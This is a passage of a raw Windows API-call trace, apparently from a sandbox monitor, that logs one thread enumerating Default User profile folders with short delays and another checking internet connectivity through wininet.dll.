FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x009\x00.\x000\x00 |
SUCCESS | 0x00000000 | |
| 07:43:53,896 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:53,976 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Application Data\Microsoft\Windows Media\9.0\*.* |
SUCCESS | 0x0016e9e0 | |
| 07:43:53,976 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00ime=W.x\x00\x00\x00\x00\x00\x00\x00\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\xf2\x01\x00\x00\x00\x00\x00\x00\xf8\x01\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00W\x00M\x00S\x00D\x00K\x00N\x00S\x00.\x00D\x00T\x00D\x00s\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01\x90\xbe8\xd1\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:53,976 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000190 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,976 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,976 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,976 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:53,976 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,056 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\History\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:54,056 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xac59oI\xcd\x01\x80\x99X7\xd5I\xcd\x01P\xac59oI\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01q\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00p\x00l\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xf7\xa79\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:54,056 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,146 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\History\History.IE5\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:54,146 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x10\xf7\xa79\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arx\x00\x00\x00\x00\x00\x00\x00\x10\xf7\xa79\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01q\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00r\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\xf7\xa79\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01 R!0oI\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:54,146 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,146 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,146 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,196 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:54,196 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:54,196 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:54,196 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:54,196 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:54,226 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Temp\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:54,226 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00P\xac59oI\xcd\x01\x80\x99X7\xd5I\xcd\x01P\xac59oI\xcd\x01P\xac59oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:54,226 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,226 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,306 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:54,306 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => h\x00\x00\x00\x00\x00\x00\x00 %49oI\xcd\x01\x80\x99X7\xd5I\xcd\x01 %49oI\xcd\x01\x80a\xa39\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xb0\xe8\xa49\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00o\x00n\x00t\x00e\x00n\x00t\x00.\x00I\x00E\x005\x00p\x00l\x00\x00\x00\x00\x00\x00\x00\x00\x00\x80a\xa39\xd5I\xcd\x01\x80a\xa39\xd5I\xcd\x01\x80a\xa39\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:54,306 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,386 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:54,386 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xe8\xa49\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\x10\xf7\xa79\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00urn"arp\x00\x00\x00\x00\x00\x00\x00\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x009\x003\x00D\x004\x00Q\x00A\x00H\x00i\x00x\x00\x00\x00\x00\x00\x00\x00\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:54,386 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,466 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\A93D4QAH\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:54,466 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:54,466 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,466 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,547 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\ILCLAAS6\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:54,547 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:54,547 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,547 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,627 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\WEXIGKLS\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:54,627 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01\xe0o\xa69\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:54,627 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,627 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,707 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Local Settings\Temporary Internet Files\Content.IE5\YMYTYN4M\*.* |
SUCCESS | 0x0016cda0 | |
| 07:43:54,707 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00FF}MIC\x00\x00\x00\x00\x00\x00\x00\x00\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01\xb0\xe8\xa49\xd5I\xcd\x01C\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00 |
SUCCESS | 0x00000000 | |
| 07:43:54,707 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000188 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,707 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000194 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,707 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000180 FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,707 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,707 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,927 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\My Documents\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:54,927 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01\x80\x99X7\xd5I\xcd\x01\xf0\x9d29oI\xcd\x01\xf0\x9d29oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:54,927 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:54,927 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:54,997 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:43:54,997 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:43:54,997 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:43:54,997 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:43:54,997 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:43:55,017 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\NetHood\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:55,017 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xc0\x1619oI\xcd\x01\x80\x99X7\xd5I\xcd\x01\xc0\x1619oI\xcd\x01\xf0\x9d29oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:55,017 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,017 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,097 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\PrintHood\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:55,097 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01\x80\x99X7\xd5I\xcd\x01\xf0\x9d29oI\xcd\x01\xf0\x9d29oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:55,097 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,097 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,178 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Recent\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:55,178 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => \x00\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01\x80\x99X7\xd5I\xcd\x01\xf0\x9d29oI\xcd\x01\xf0\x9d29oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x12\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00 |
SUCCESS | 0x00000000 | |
| 07:43:55,178 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,178 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,258 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\SendTo\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:55,268 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01`"u\xb0\xd4I\xcd\x01`"u\xb0\xd4I\xcd\x01`"u\xb0\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x13\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00\xb0\x00\x00\x00\x00\x00\x00\x000\x9bs\xb0\xd4I\xcd\x010\x9bs\xb0\xd4I\xcd\x010\x9bs\xb0\xd4I\xcd\x010\x9bs\xb0\xd4I\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00R\x00\x00\x00\x00\x00\x00\x00\x18\x00C\x00O\x00M\x00P\x00R\x00E\x00~\x001\x00.\x00Z\x00F\x00S\x00C\x00o\x00m\x00p\x00r\x00e\x00s\x00s\x00e\x00d\x00 \x00(\x00z\x00i\x00p\x00p\x00e\x00d\x00)\x00 \x00F\x00o\x00l\x00d\x00e\x00r\x00.\x00Z\x00F\x00 |
SUCCESS | 0x00000000 | |
| 07:43:55,268 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:43:55,268 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,348 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Start Menu\*.* |
SUCCESS | 0x0016eaa0 | |
| 07:43:55,348 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01`rA\x8a\xd4I\xcd\x01\xf0\x9d29oI\xcd\x01\xf0\x9d29oI\xcd\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00\x00\x00\x00\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x010[\xc4T\xd4I\xcd\x01\xf0\x9d29oI\xcd\x01\xf0\x9d29oI\xcd\x01>\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00\x00&\x00\x00\x00\x16\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00d\x00e\x00s\x00k\x00t\x00o\x00p\x00.\x00i\x00n\x00i\x00(\x00z\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x9d29oI\xcd\x01\xa0\xcbZ\xd8\xd4I\xcd\x01\xa0\xcbZ\xd8\xd4I\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:43:55,348 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:43:55,438 | 504 | FindFirstFileExW |
FileName => C:\Documents and Settings\Default User\Start Menu\Programs\*.* |
SUCCESS | 0x0016e590 | |
| 07:43:55,438 | 504 | NtQueryDirectoryFile |
